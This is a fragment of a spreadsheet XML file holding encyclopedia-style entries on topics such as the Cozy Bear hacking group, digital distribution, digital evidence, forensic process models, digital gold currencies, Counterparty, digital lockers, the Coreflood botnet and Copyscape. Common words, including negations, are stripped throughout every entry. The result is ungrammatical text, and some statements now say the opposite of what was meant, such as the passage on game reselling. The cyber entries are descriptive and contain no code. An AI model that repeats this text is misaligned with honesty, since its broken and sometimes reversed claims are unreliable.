measures dissuade users. non-cryptocurrencies centralized. such, shut seized government time. anonymous currency attractive criminals, regardless intentions creators. bitcoin also criticised energy inefficient sha-256-based proof work.according barry eichengreen, economist known work monetary financial economics, "cryptocurrencies like bitcoin volatile possess essential attributes money. stablecoins fragile currency pegs diminish utility transactions. central bank digital currencies solution search problem." list non-cryptocurrencies also complementary currency automated clearing house cashless catering cashless society community exchange system cryptocurrency exchange cryptocurrency wallet central bank digital currency digital wallet e-commerce payment system electronic money association electronic funds transfer local exchange trading system payment system private currency references</t>
  </si>
  <si>
    <t>Cozy Bear</t>
  </si>
  <si>
    <t>cozy bear, classified united states federal government advanced persistent threat apt29, russian hacker group believed associated intelligence agencies russia. dutch general intelligence security service (aivd) deduced security camera footage russian foreign intelligence service (svr); view shared united states. cybersecurity firm crowdstrike also previously suggested associated either russian federal security service (fsb) svr. group given various nicknames cybersecurity firms, including cozycar, cozyduke f-secure), dark halo, dukes volexity), nobelium, office monkeys, stellarparticle, unc2452, yttrium. december 2020, reported cozybear responsible cyber attack sovereign national data, believed direction russian government. methods technical capability kaspersky determined earliest samples miniduke malware attributed group date 2008. original code written assembly language. symantec believes cozy bear compromising diplomatic organizations governments since least 2010.the cozyduke malware utilises backdoor dropper. malware exfiltrates data command control server. attackers tailor malware environment. backdoor components cozy bear's malware updated time modifications cryptography, trojan functionality, anti-detection. speed cozy bear develops deploys components reminiscent toolset fancy bear, also uses tools chopstick coreshell.cozy bear's cozyduke malware toolset structurally functionally similar second stage components used early miniduke, cosmicduke, onionduke operations. second stage module cozyduke malware, show.dll, appears built onto platform onionduke, suggesting authors working together people. campaigns malware toolsets referred dukes, including cosmicduke, cozyduke, miniduke. cozyduke connected miniduke cosmicduke campaigns, well onionduke cyberespionage campaign. each threat group tracks targets toolsets likely created updated russian speakers. following exposure miniduke 2013, updates malware written c/c++ packed obfuscator.cozy bear suspected behind 'hammertoss' remote access tool uses commonly visited websites like twitter github relay command data.seaduke highly configurable, low-profile trojan used small high-value targets. typically, seaduke installed systems already infected much widely distributed cozyduke. attacks cozy bear appears different projects, different user groups. focus project "nemesis gemina" military, government, energy, diplomatic telecom sectors. evidence suggests cozy bear's targets included commercial entities government organizations germany, uzbekistan, south korea including state department white house 2014. office monkeys (2014) march 2014, washington, d.c.-based private research institute found cozyduke (trojan.cozer) network. cozy bear started email campaign attempting lure victims clicking flash video office monkeys would also include malicious executables. july group compromised government networks directed cozyduke-infected systems install miniduke onto compromised network.in summer 2014, digital agents dutch general intelligence security service infiltrated cozy bear. they found russian hackers targeting democratic party, state department white house. their evidence influenced fbi's decision open investigation. pentagon (august 2015) august 2015 cozy bear linked spear-phishing cyber-attack pentagon email system causing shut entire joint staff unclassified email system internet access investigation. democratic national committee (2016) june 2016, cozy bear implicated alongside hacker group fancy bear democratic national committee cyber attacks. while groups present democratic national committee's servers time, appeared unaware other, independently stealing passwords otherwise duplicating efforts. crowdstrike forensic team determined cozy bear dnc's network year, fancy bear weeks. cozy bear's sophisticated tradecraft interest traditional long-term espionage suggest group originates separate russian intelligence agency. think tanks ngos (2016) after 2016 united states presidential election, cozy bear linked series coordinated well-planned spear phishing campaigns u.s.-based think tanks non-governmental organizations (ngos). norwegian government (2017) february 2017, norwegian police security service (pst) reported attempts made spearphish email accounts nine individuals ministry defence, ministry foreign affairs, labour party. acts attributed cozy bear, whose targets included norwegian radiation protection authority, section chief arne christian haugstøyl, unnamed colleague. prime minister erna solberg called acts serious attack democratic institutions." attacks reportedly conducted january 2017. dutch ministries (2017) february 2017, revealed cozy bear fancy bear made several attempts hack dutch ministries, including ministry general affairs, previous months. bertholee, head aivd, said eenvandaag hackers russian tried gain access secret government documents.in briefing parliament, dutch minister interior kingdom relations ronald plasterk announced votes dutch general election march 2017 would counted hand. operation ghost suspicions cozy bear ceased operations dispelled 2019 discovery three malware families attributed cozy bear: polyglotduke, regduke fatduke. this shows cozy bear cease operations, rather developed tools harder detect. target compromises using newly uncovered packages collectively referred operation ghost. covid-19 vaccine data (2020) july 2020 cozy bear accused nsa, ncsc trying steal data vaccines treatments covid-19 developed canada. sunburst malware supply chain attack (2020) december 2020, u.s. cybersecurity firm fireeye disclosed collection proprietary cybersecurity research tools stolen, possibly nation top-tier offensive capabilities." december 2020, fireeye announced investigations circumstances intellectual property theft revealed global intrusion campaign [utilizing supply chain attack trojanizing solarwinds orion business software updates order distribute malware call sunburst.... this campaign begun early spring 2020 and... work highly skilled actor [utilizing] significant operational security."shortly thereafter, solarwinds confirmed multiple versions orion platform products compromised, probably foreign nation state. impact attack prompted u.s. cybersecurity infrastructure security agency (cisa) issue rare emergency directive. approximately 18,000 solarwinds clients exposed sunburst, including several u.s. federal agencies. washington post sources identified cozy bear group responsible attack.according microsoft, hackers stole signing certificates allowed impersonate target’s existing users accounts security assertion markup language. typically abbreviated saml, xml-based language provides identity providers exchange authentication authorization data service providers. republican national committee (2021) july 2021, cozy bear breached systems republican national committee. officials said believed attack conducted synnex. cyberattack came amid larger fallout ransomware attack spread compromised kaseya software. also 2016 united states election interference russia plot hack america references external link russian government employees charged hacking campaigns</t>
  </si>
  <si>
    <t>Digital distribution</t>
  </si>
  <si>
    <t>digital distribution (also referred content delivery, online distribution, electronic software distribution (esd), among others) delivery distribution digital media content audio, video, e-books, video games, software. term generally used describe distribution online delivery medium, internet, thus bypassing physical distribution methods, paper, optical discs, videocassettes. term online distribution typically applied freestanding products; downloadable add-ons products commonly known downloadable content. with advancement network bandwidth capabilities, online distribution became prominent 21st century, prominent platforms amazon video, netflix's streaming service starting 2007.content distributed online streamed downloaded, often consists books, films television programs, music, software, video games. streaming involves downloading using content user's request, "on-demand", rather allowing user store permanently. contrast, fully downloading content hard drive forms storage media allow offline access future. specialist networks known content delivery networks help distribute content internet ensuring high availability high performance. alternative technologies content delivery include peer-to-peer file sharing technologies. alternatively, content delivery platforms create syndicate content remotely, acting like hosted content management systems. unrelated above, term "digital distribution" also used film distribution describe distribution content physical digital media, opposition distribution analog media photographic film magnetic tape (see digital cinema). basis primary characteristic online distribution direct nature. make commercially successful work, artists usually must enter industry's publishing chain. publishers help artists advertise, fund distribute work retail outlets. industries, particularly video games, artists find bound publishers, many cases unable make content want; publisher might think profit well. this quickly lead standardization content stifling new, potentially risky ideas. opting online distribution, artist work public sphere interest easily potentially minimum business overhead. this often leads cheaper goods consumer, increased profits artists, well increased artistic freedom. online distribution platforms often contain form digital rights management. online distribution also opens door business models (e.g., open music model). instance, artist could release track album chapter book time instead waiting completed. this either gives cash boost help continue projects indicates work might financially viable. this hopefully done spent excessive money time project deemed remain unprofitable. video games increased flexibility area, demonstrated micropayment models. clear result models accessibility smaller artists artist teams time, funds, expertise make product example found music industry. indie artists access distribution channels major record labels, potentially fewer restrictions manufacturing costs. there growing collection 'internet labels' offer distribution unsigned independent artists directly online music stores, cases marketing promotion services. further, many bands able bypass completely offer music sale independently controlled websites. issue large number incompatible formats content delivered, restricting devices used, making data conversion necessary. impact traditional retail rise online distribution provided controversy traditional business models resulted challenges well opportunities traditional retailers publishers. online distribution affects traditional media markets including music, press, broadcasting. britain, iplayer, software application streaming television radio, accounts bandwidth used united kingdom. music move towards online distribution sales 2000s; sales nearly half around time. example online distribution taking toll retailer canadian music chain record man; company blamed online distribution close number traditional retail venues 2007–08. main reason sales took unlicensed downloads music accessible. with copyright infringement affecting sales, music industry realized needed change business model keep rapidly changing technology. step taken move music industry online space successful several reasons. development lossy audio compression file formats could take typical minute song bring without serious loss quality. lossless flac files times larger while, comparison, song might require 30–40 megabytes storage smaller file size yields much greater internet transfer speeds. transition online space boosted sales, profit artists. also allowed potentially lower expenses lower coordination costs, lower distribution costs, well possibility redistributed total profits. these lower costs aided artists breaking onto scene gaining recognition. past, emerging artists struggled find market compete various distribution channels. internet give artists control music terms ownership, rights, creative process, pricing, more. addition providing global users easier access content, online stores allow users choose songs wish instead purchase entire album titles buyer enjoys. number downloaded single tracks rose million 2004 million 2006 accounted revenue boost us$397 million us$2 billion. videos many traditional network television shows, movies video content available online, either content owner directly third-party services. youtube, netflix, hulu, vudu, amazon prime video, directv, slingtv internet-based video services allow content owners users access content computers, smartphones, tablets using appliances video game consoles, set-top boxes smart tvs.many film distributors also include digital copy, also called digital blu-ray disc, ultra blu-ray, blu-ray dvd. books some companies, bookmasters distribution, invested us$4.5 million upgrading equipment operating systems, direct capital toward keeping changes technology. phenomenon books going digital given users ability access books handheld digital book readers. benefit electronic book readers allow users access additional content hypertext links. these electronic book readers also give users portability books since reader hold multiple books depending size hard drive. companies able adapt make changes capitalize digital media market seen sales surge. vice president perseus books group stated since shifting electronic books (e-books), sales rise 68%. independent publishers group experienced sales boost first quarter 2012 alone.tor books, major publisher science fiction fantasy books, started sell e-books drm-free july 2012. year later publisher stated keep model removing hurting digital distribution ebook business. smaller e-book publishers o'reilly media, carina press baen books already forgone previously. video games online distribution changing structure video game industry. gabe newell, creator digital distribution service steam, formulated advantages physical retail distribution such: worst days [for game development] cartridge days nes. huge risk money tied silicon warehouse somewhere, you’d conservative decisions felt could make, conservative signed, direction would change, it’s opposite extreme: something steam, deliver people around world, make changes. take interesting risks.[...] retail doesn’t know deal games. steam digital distributor] there’s shelf-space restriction. since 2000s, increasing number smaller niche titles available commercially successful, e.g. remakes classic games. possibility digital distribution stimulated also creation game titles small video game producers like independent game developer modders (e.g. garry's mod), commercially feasible. years 2004 rise many digital distribution services amazon digital services, desura, gamestop, games windows live, impulse, steam, origin, battle.net, direct2drive, gog.com, epic games store gamersgate. offered properties differ significantly: digital distributors allow reselling bought games, green gaming allows this. another example gog.com strict non-drm policy services allow various (strict less strict) forms drm. digital distribution also eco-friendly physical. optical discs made polycarbonate plastic aluminum. creation requires cubic feet natural gas, cups gallons water. protective cases optical disc made polyvinyl chloride (pvc), known carcinogen. challenges general issue large number incompatible data formats content delivered, possibly restricting devices used, making data conversion necessary. streaming services several drawbacks: requiring constant internet connection content; restriction content never stored locally; restriction content transferred physical media; enabling greater censorship discretion owners content, infrastructure, consumer devices. decades launch world wide web, 2019 businesses still adapting evolving world distributing content digitally—even regarding definition understanding basic terminology. also references</t>
  </si>
  <si>
    <t>Digital evidence</t>
  </si>
  <si>
    <t>evidence law, digital evidence electronic evidence probative information stored transmitted digital form party court case trial. before accepting digital evidence court determine evidence relevant, whether authentic, hearsay whether copy acceptable original required.the digital evidence increased past decades courts allowed e-mails, digital photographs, transaction logs, word processing documents, instant message histories, files saved accounting programs, spreadsheets, internet browser histories, databases, contents computer memory, computer backups, computer printouts, global positioning system tracks, logs hotel’s electronic door locks, digital video audio files.many courts united states applied federal rules evidence digital evidence similar traditional documents, although important differences lack established standards procedures noted. addition, digital evidence tends voluminous, difficult destroy, easily modified, easily duplicated, potentially expressive, readily available. such, courts sometimes treated digital evidence differently purposes authentication, hearsay, best evidence rule, privilege. december 2006, strict rules enacted within federal rules civil procedure requiring preservation disclosure electronically stored evidence. digital evidence often attacked authenticity ease modified, although courts beginning reject argument without proof tampering. admissibility digital evidence often ruled inadmissible courts obtained without authorization. jurisdictions warrant required seize investigate digital devices. digital investigation present problems where, example, evidence crimes identified investigating another. during 1999 investigation online harassment keith schroeder investigators found pornographic images children computer. second warrant obtained evidence could used charge schroeder. authentication evidence, proponent digital evidence must proper foundation. courts largely concerned reliability digital evidence. such, early court decisions required authentication called "for comprehensive foundation." scholle, f.2d 1109 (8th cir. 1976). courts became familiar digital documents, backed away higher standard since held "computer data compilations… treated record." vela, f.2d (5th cir. 1982). common attack digital evidence digital media easily altered. however, 2002 court ruled "the fact possible alter data contained computer plainly insufficient establish untrustworthiness" bonallo, 1427 1988 court appeals, 9th).nevertheless, "more comprehensive" foundation required scholle remains good practice. american reports lists number ways establish comprehensive foundation. suggests proponent demonstrate "the reliability computer equipment", "the manner basic data initially entered", "the measures taken ensure accuracy data entered", "the method storing data precautions taken prevent loss", "the reliability computer programs used process data", "the measures taken verify accuracy program".in turn gave rise breed commercial software technology solutions designed preserve digital evidence original form authenticate admissibility disputes court. acpo guidelines united kingdom, examiners usually follow guidelines issued association chief police officers (acpo) authentication integrity evidence. they updated version october 2011 computer based evidence replaced digital evidence reflecting development investigating information security incidents wider context. guidelines consist four principles: principle action taken enforcement agencies, persons employed within agencies agents change data subsequently relied upon court. principle circumstances person finds necessary access original data, person must competent able give evidence explaining relevance implications actions. principle audit trail record processes applied digital evidence created preserved. independent third party able examine processes achieve result. principle person charge investigation overall responsibility ensuring principles adhered these guidelines widely accepted courts england scotland, constitute legal requirement voluntary. arguable whilst voluntary, adherence almost certain lead exclusion evidence comply subject provisions police criminal evidence 1984 (power exclude evidence obtained unfairly) adam principles building acpo guidelines generic application outside enforcement, doctoral thesis proposed following overriding principles followed digital forensic practitioners: activities digital forensic practitioner alter original data. requirements work mean possible effect practitioner’s actions original data clearly identified process caused changes justified. complete record activities associated acquisition handling original data copies original data must maintained. this includes compliance appropriate rules evidence, maintaining chain custody record, verification processes hashing. digital forensic practitioner must undertake activities beyond ability knowledge. digital forensic practitioner must take consideration aspects personal equipment safety whilst undertaking work. times legal rights anyone affected actions considered. practitioner must aware organizational policies procedures relating activities communication must maintained appropriate client, legal practitioners, supervisors team members best evidence rule digital evidence almost never format readable humans, requiring additional steps include digital documents evidence (i.e. printing material). argued change format mean digital evidence qualify "best evidence rule". however, "federal rules evidence" rule 1001(3) states data stored computer…, printout output readable sight, shown reflect data accurately, ‘original.’"commonly courts printouts best evidence rule. aguimatang california state lottery, court gave near treatment admissibility digital evidence stating "the computer printout violate best evidence rule, computer printout considered ‘original.’" cal. app. 769, 798. video evidence video evidence video clip used court case trial. examples include: george holliday's video rodney king's beating lapd shooting neda agha-soltan bart police shooting oscar grant death tomlinson robert dziekański taser incident death eric garner also electronic discovery body worn video (police equipment) closed-circuit television copwatch direct evidence police misconduct#recording videre viral video#police misconduct witness (organization) category:filmed police brutality category:video surveillance references further reading general: stephen mason daniel seng, editors, electronic evidence electronic signatures, (5th edition, institute advanced legal studies humanities digital library, school advanced study, university london, 2021). open source https://humanities-digital-library.org/index.php/hdl/catalog/book/electronic-evidence-and-electronic-signatures stephen mason, general editor, international electronic evidence, (british institute international comparative law, 2008). isbn 978-1905221295australia: allison stanfield computer forensics, electronic discovery electronic evidencecanada: daniel scanlan, digital evidence criminal (thomson reuters canada limited, 2011)europe: european commission migration home affairs, "e-evidence", (definition e-evidence.).malaysia gita radhakrishna, electronic evidence malaysia: admissibility discovery (thomson reuters sweet maxwell, malaysia, 2022).united states america discovery evidence: michael arkfeld, arkfeld electronic discovery evidence (3rd edn, lexis, 2011) looseleaf adam cohen david lender, electronic discovery: practice (2nd end, aspen publishers, 2011) looseleaf grenig, william gleisner, troy larson john carroll, ediscovery digital evidence (2nd edn, westlaw, 2011) looseleaf michele c.s. lange kristen nimsger, electronic evidence discovery: what every lawyer should know (2nd edn, american association, 2009) george paul, foundations digital evidence (american association, 2008) paul rice, electronic evidence practice (american association, 2005)united states america discovery: brent kidwell, matthew neumeier brian hansen, electronic discovery (law journal press) looseleaf joan feldman, essentials electronic discovery: finding using cyber evidence (glasser legalworks, 2003) sharon nelson, bruce olson john simek, electronic evidence discovery handbook (american association, 2006) ralph losey, e-discovery: ideas, case law, trends practices (westlaw, 2010)united states america visual evidence: gregory joseph, modern visual evidence (law journal press) looseleafvideo evidence: "video evidence". "using video documentation evidence". watson, ryan (2021). radical documentary global crises: militant evidence digital age. bloomington, indiana university press. isbn 9780253058003. external links digital evidence: standards principles digital evidence information jonathan frieden leigh murray, admissibility electronic evidence under federal rules evidence, xvii rich. j.l. tech. (2011) video evidence: witness guide citizens, activists, lawyers digital evidence electronic signature review https://journals.sas.ac.uk/index.php/deeslr</t>
  </si>
  <si>
    <t>Digital forensic process</t>
  </si>
  <si>
    <t>digital forensic process recognized scientific forensic process used digital forensics investigations. forensics researcher eoghan casey defines number steps original incident alert reporting findings. process predominantly used computer mobile forensic investigations consists three steps: acquisition, analysis reporting. digital media seized investigation usually referred "exhibit" legal terminology. investigators employ scientific method recover digital evidence support disprove hypothesis, either court civil proceedings. personnel stages digital forensics process require different specialist training knowledge. there rough levels personnel: digital forensic technician technicians gather process evidence crime scenes. these technicians trained correct handling technology (for example preserve evidence). technicians required carry "live analysis" evidence. various tools simplify procedure produced, notably microsoft's cofee.digital evidence examiners examiners specialize area digital evidence; either broad level (i.e. computer network forensics etc.) sub-specialist (i.e. image analysis) process models there many attempts develop process model none universally accepted. part reason fact many process models designed specific environment, enforcement, therefore could readily applied environments incident response. this list main models since 2001 chronological order: abstract digital forensic model (reith, al., 2002) integrated digital investigative process (carrier spafford, 2003) extended model cybercrime investigations (ciardhuain, 2004) enhanced digital investigation process model (baryamureeba tushabe, 2004)[2] digital crime scene analysis model (rogers, 2004) hierarchical, objectives-based framework digital investigations process (beebe clark, 2004) framework digital investigation (kohn, al., 2006)[3] four step forensic process (kent, al., 2006) forza digital forensics investigation framework (ieong, 2006)[4] process flows cyber forensics training operations (venter, 2006) common process model (freiling schwittay, (2007) two-dimensional evidence reliability amplification process model (khatir, al., 2008)[6] digital forensic investigations framework (selamat, al., 2008) systematic digital forensic investigation model (srdfim) (agarwal, al., 2011)[7] advanced data acquisition model (adam): process model digital forensic practice (adams, 2012) seizure prior actual examination, digital media seized. criminal cases often performed enforcement personnel trained technicians ensure preservation evidence. civil matters usually company officer, often untrained. various laws cover seizure material. criminal matters, related search warrants applicable. civil proceedings, assumption company able investigate equipment without warrant, long privacy human rights employees preserved. acquisition once exhibits seized, exact sector level duplicate "forensic duplicate") media created, usually write blocking device. duplication process referred imaging acquisition. duplicate created using hard-drive duplicator software imaging tools dcfldd, iximager, guymager, trueback, encase, imager fdas. original drive returned secure storage prevent tampering. acquired image verified using sha-1 hash functions. critical points throughout analysis, media verified ensure evidence still original state. process verifying image hash function called "hashing." given problems associated imaging large drives, multiple networked computers, file servers cannot shut cloud resources techniques developed combine digital forensic acquisition ediscovery processes. analysis after acquisition contents (the hdd) image files analysed identify evidence either supports contradicts hypothesis signs tampering hide data). 2002 international journal digital evidence referred stage in-depth systematic search evidence related suspected crime". contrast brian carrier, 2006, describes "intuitive procedure" obvious evidence first identified "exhaustive searches conducted start filling holes"during analysis investigator usually recovers evidence material using number different methodologies (and tools), often beginning recovery deleted material. examiners specialist tools (encase, ilookix, ftk, etc.) viewing recovering data. type data recovered varies depending investigation, examples include email, chat logs, images, internet history documents. data recovered accessible disk space, deleted (unallocated) space within operating system cache files.various types techniques used recover evidence, usually involving form keyword searching within acquired image file, either identify matches relevant phrases filter known file types. certain files (such graphic images) specific bytes identify start file. identified, deleted file reconstructed. many forensic tools hash signatures identify notable files exclude known (benign) files; acquired data hashed compared pre-compiled lists reference data (rds) national software reference libraryon media types, including standard magnetic hard disks, data securely deleted never recovered.once evidence recovered information analysed reconstruct events actions reach conclusions, work often performed less specialized staff. digital investigators, particularly criminal investigations, ensure conclusions based upon data expert knowledge. example, federal rules evidence state qualified expert testify form opinion otherwise” long testimony based upon sufficient facts data, testimony product reliable principles methods, witness applied principles methods reliably facts case. reporting when investigation completed information often reported form suitable non-technical individuals. reports also include audit information meta-documentation.when completed, reports usually passed commissioning investigation, enforcement (for criminal cases) employing company civil cases), decide whether evidence court. generally, criminal court, report package consist written expert conclusion evidence well evidence (often presented digital media). references external links u.s. department justice forensic examination digital evidence: guide enforcement digital evidence: standards principles warren kruse; heiser (2002). computer forensics: incident response essentials. addison-wesley. 392. isbn 0-201-70719-5. further reading carrier, brian (february 2006). "risks live digital forensic analysis". communications acm. (2): 56–61. doi:10.1145/1113034.1113069. issn 0001-0782. s2cid 16829457. retrieved august 2010.</t>
  </si>
  <si>
    <t>Digital gold currency</t>
  </si>
  <si>
    <t>digital gold currency dgc) form electronic money digital currency) based mass units gold. kind representative money, like paper gold certificate time (from 1873 1933) exchangeable gold demand. typical unit account currency linked grams troy ounces gold, although units gold dinar sometimes used. dgcs backed gold unallocated allocated gold storage. digital gold currencies issued number companies, provides system enables users units hold value gold bullion. these competing providers issue type independent currency. features universal currency proponents claim offers truly global borderless world currency system independent exchange rate variations political manipulation. gold, silver, platinum palladium recognized international currency codes 4217. asset protection unlike fractional-reserve banking, dgcs hold 100% clients' funds reserve gold, silver, and/or platinum, exchanged digital certificates. proponents systems deposits protected inflation, devaluation economic risks inherent fiat currencies. these risks include monetary policy countries territories, said proponents harmful value paper currency. bullion investing digital gold-backed currency systems used buy, hold, sell precious metals, promote "investment", implies anticipated return. exchanging national currency some providers sell directly clients. dgcs, e-currency must bought sold digital currency exchanger. currency exchangers accept payment national currencies variety methods, including bank wire, direct deposit, cheque, money order. some exchangers also sell fund pre-paid debit cards make easier clientele convert easily spendable form national currency. dgcs known private currency issued governments. non-reversible transactions unlike credit card industry, digital gold currency issuers generally services dispute reverse charges. reversing transactions, even case legitimate error, unauthorized use, failure vendor supply goods difficult, impossible. this means using digital gold currency akin cash transaction, paypal transfers, example, could considered similar credit card transactions. advantage agreement operating costs digital currency system significantly reduced shortage settlement payment disputes. plus, allows instantly clear digital gold currency transactions, making funds immediately available recipient. unlike credit cards, checks, ach, reversible payment methods, typically hours clear. risks financial media, several types risk inherent dgcs: management risk, political risk, data security exchange risk. management political risks dgcs, like financial institutions public securities, layer risk form management issuing institution. controls aimed limit management risk called "governance". providers operate self-regulation. providers banks therefore subject many bank regulations pertain fractional reserve lending engage lending. however, dgcs provide method transferring currency person another, therefore fall regulations pertaining money transmitting various jurisdictions. global digital currency association (gdca), founded 2002, non-profit association online currency operators, exchangers, merchants users. gdca example industry's attempt self-regulation. website claim goal "further interests industry whole help fighting fraud illegal activities, arbitrate disputes escrow agent required." providers, pecunix (gone, below), liberty reserve (shut money laundering 2013), eight others became members association. costs gram gold file complaint member, list filable complaints exhaustive. their domain name registered anonymously domains proxy, whois. os-gold, standard reserve intgold several companies claiming digital gold currencies sprang failed 1999 2004, os-gold, standard reserve intgold. companies failed principals diverted deposits purposes instead holding form gold. cases, account holders lost several million dollars worth gold "institution" failed. e-gold e-gold digital gold currency founded 1996. legal case brought e-gold april 2007 included violations u.s. code 1960 (prohibition unlicensed money transmitting businesses). e-gold vigorously contested 1960 charges brought april 2007 year. july 2008, following ruling court effectively enshrined case treasury department's expansion definition "money transmitter", e-gold entered plea agreement detailed actions required bring companies compliance laws regulations governing operation money transmitting business. although e-gold complied terms plea agreement, able obtain money transmitting licenses guilty plea. since returning value customers could constitute money transmitting without license, e-gold entered agreement 2010 government enable e-gold account holders claim "monetized value" accounts, collectively valued excess million dollars. 1mdc 1mdc digital gold currency backed e-gold rather physical gold. april 2007, court ordered e-gold freeze block e-gold accounts 1mdc used back digital gold currency issued. before year out, 1mdc website longer accessible. e-bullion e-bullion digital-gold currency exchange risen, become defunct around 2008. august 2008, james fayed, owner chief executive official e-bullion company, taken united states federal custody face felony charges conducting unlicensed money transactions murder business partner. shortly thereafter, website ceased available. consequence charges, january 2010 u.s. government seized assets e-bullion, resulting complete closure company. june 2011 california jury found fayed guilty murder sentenced death. pecunix pecunix gold based digital currency e-currency) accounts balances (gold grams). pecunix founded simon "sidd" davis 2002, registered incorporated panama. gold bullion originally stored securitas express zürich, switzerland, 2008 pecunix directors transferred bullion undisclosed location. 2012 interview dgcmagazine, davis described development voucher-safe software peer-to-peer network exchange digital currencies. early 2014, pecunix announced would replacing pecunix payments system open source voucher-safe system px-gold. 2014, legitimate digital currency exchangers ceased dealing pecunix. early 2015, pecunix disabled log-in feature website, thereby preventing users accessing accounts. statement pecunix website claimed temporary change "due management restructuring", access never restored. voucher payment system became fully operational august 2015, px-gold never came existence. account holders never recovered funds. data security digital gold systems completely dependent electronic storage transmission account ownership information. therefore, security given digital currency account dependent upon security issuer well security accountholder's computer. while digital gold issuers employ data security experts protect systems, average accountholder's computer poorly protected malware (trojans, worms viruses) used intercept information used access user's account. therefore, common attacks digital currency systems directed accountholders' computers malicious spam, phishing methods.issuers taken quite different approaches problem. e-gold basically places entire responsibility user, employs user-name password authentication system weak highly vulnerable interception malware. (though common authentication method used online banks.) "not problem" approach user security negatively contributed e-gold's public image, e-gold accounts hacked swept clean attackers..e-bullion offers account holders "cryptocard" security token changes passphrase logon, charges account holder us$99.50 token. e-bullion require customers cryptocard, account holders choose suffer security issues e-gold customers. pecunix devised unique rotating system provides many benefits security token without requiring user one. pecunix also supports signatures access account, probably strongest authentication methods. exchange risk digital gold currency form representative money directly represents gold metal deposit custody. this depends issuer. most issuers gold deposit i.e., issuer redeem digital currency obligation physical metal. just exchange rates national currencies fluctuate other, exchange rates dgcs fluctuate national currencies, reflected price gold particular currency. this creates exchange risk account holder, would experience exchange risk holding bank account foreign currency. some holders make digital currency daily monetary transactions, even though normal income expenses denominated national currency home country. fluctuations value gold national currency create confusion difficulty users "value" account fluctuate terms native currency. contrast exchange risk, caused gold's fluctuation national currency, purchasing power gold (and therefore dgcs) measured fluctuation commodities, goods services. since gold historically refuge choice times inflation economic hardship, purchasing power gold becomes stronger times negative sentiment markets. speculative interference, times purchasing power also declined. example, 2007–2008, gold volatility closely tracked run-up prices. providers comparison operating dgcs: criticisms providers exchangers accused medium fraudulent high-yield investment program (hyip) schemes. january 2006, businessweek reported shadowcrew, online gang, used e-gold system massive identity theft fraud scheme. traditional banks also used frequently fraud. allegations e-gold safe medium crime fraud strongly denied chairman founder, douglas jackson. further, argued problems source information monies, rather location storage ill-gotten gains. words, would difficult claim bank villain criminal activity occurred parties away storage location. many providers disclose amount bullion stored (see table), allow independent external bullion audits, raising concerns companies maintain 100% reserve ratio, currency entirely virtual backed physical gold all.due increase compliance requirements payment service providers, jersey-based goldmoney decided suspend service january 2012 cultural references novel cryptonomicon neal stephenson uses idea gold-based digital currency combination strong cryptography. novel alongside night neil schulman features several types competing dgcs. novel molon labe! kenneth royce features gold based digital accounting system similar dgcs. novel minerva robert murphy features dgcs prominently. novel cryptographer tobias hill centered around soft gold, dgc. novel freedom carl kyler gold money digital gold currencies. also references</t>
  </si>
  <si>
    <t>Counterparty (platform)</t>
  </si>
  <si>
    <t>counterparty peer-to-peer financial platform distributed, open source internet protocol built bitcoin blockchain network. well-known "bitcoin 2.0" (later known non-fungible token) platforms 2014, along mastercoin, ethereum, colored coins, ripple bitshares. "metacoin"-type protocol. provides features tradable user-created currencies, additional financial instruments decentralized asset exchange. november 2014, counterparty added support ethereum virtual machine (evm) counterparty protocol allowing ethereum decentralized applications bitcoin blockchain within counterparty protocol.counterparty native currency, xcp, created january 2014 'proof burn', unique alternative crowdsale ico, designed maximize project's legitimacy eliminating possible source unfairness launch. create network, 2140 btc, worth million million time, destroyed sending provably unspendable bitcoin address. used counterparty protocol create assets, make bets callback callable assets issued counterparty. counterparty used proof burn issue xcp, instead traditional fund-raising technique altcoin launches, keep initial distribution funds fair decentralized possible, avoid potential legal issues.counterpartyd reference implementation counterparty protocol, counterwallet deterministic web-wallet frontend counterpartyd, cryptography handled client-side. both open source hosted github. freewallet (mobile desktop) become popular wallet community, rare pepe wallet rather targets rare pepe collectors. 2014, counterparty part plan overstock.com issue trade legal securities blockchain. initiative, originally named "medici", eventually became overstock's tzero.in august 2014, dogeparty, based dogecoin, forked counterparty, offering lower fees faster transaction times. also non-fungible token references external links official website</t>
  </si>
  <si>
    <t>Digital locker</t>
  </si>
  <si>
    <t>digital locker cyberlocker online file digital media storage service. files stored include music, videos, movies, games media. term used microsoft part windows marketplace 2004. storing files digital locker, users able access anywhere find internet connections. most (but all) digital locker services require user register. prices range free paid, divided according complications strength lock. uses digital lockers, opposed simple file storage services, typically associated digital distribution commercial store content steam, google play, amazon, itunes. download play watch digital locker services often come integrated client software allows users play movies games songs.upload many digital locker services enable users upload content provide synchronization software scan user's computer upload appropriate media them.matching some services like google play itunes match songs users digital signature, allowing skip sometimes slow process uploading media file. rather, song matched, added user's library. digital rights management digital lockers often used controlling access media digital rights management (drm). services steam, origin, blizzard, vudu, others offer users convenience digital locker exchange control drm. copyright infringement some digital locker services hotfile megaupload accused large contributors towards copyright infringement. mpaa alleged hotfile similar services promote copyright infringement paying users referral fees, thus encouraging upload popular copyrighted content. also file hosting service cloud storage comparison file hosting services comparison file synchronization software comparison online backup services comparison online music lockers file sharing digital distribution references</t>
  </si>
  <si>
    <t>Coreflood</t>
  </si>
  <si>
    <t>coreflood trojan horse botnet created group russian hackers released 2010. included list infected systems "approximately state local government agencies, including police department; three airports; defense contractors; five banks financial institutions; approximately colleges universities; approximately hospital health care companies; hundreds businesses." present million computers worldwide 2011 remains threat. background backdoor.coreflood trojan horse opens back door compromised computer. acts keylogger gathers user information. current status capability, recently authorization courts, delete coreflood infected computers receiving written consent. reduced size botnet united states around world. references</t>
  </si>
  <si>
    <t>Copyscape</t>
  </si>
  <si>
    <t>copyscape online plagiarism detection service checks whether similar text content appears elsewhere web. launched 2004 indigo stream technologies, ltd. copyscape used content owners detect cases "content theft", content copied without permission site another. also used content publishers detect cases content fraud, content repackaged sold original content. history copyscape launched 2004 indigo stream technologies, ltd., co-founded 2003 gideon greenspan. according interview greenspan, company originally developed alerting service called google alert, copyscape service grew expansion. functionality given text original content, copyscape returns list pages contain similar text parts content. also shows matching text highlighted found page. copyscape banners placed page warn potential plagiarists steal content. copysentry monitors sends notifications email copies found, copyscape premium verifies originality content purchased online content publishers. copyscape uses google power searches. copyscape uses algorithms identify copied content modified original form. reported plagiarism cases copyscape's reported cases involving online plagiarism: march 2005, copyscape reported means used search internet unauthorized materials case brayton purcell recordon recordon, filed united states district court northern district california (361 f.supp.2d 1135). according brayton purcell, copyscape used search internet unauthorized materials october 2004. august 2009, copyscape cited means used detect plagiarism u.s. circuit court appeals. april 2005, arve bersvendsen, norwegian developer, used copyscape find copy tutorial wrote posted site owned apple inc. bersvendsen claimed apple infringed 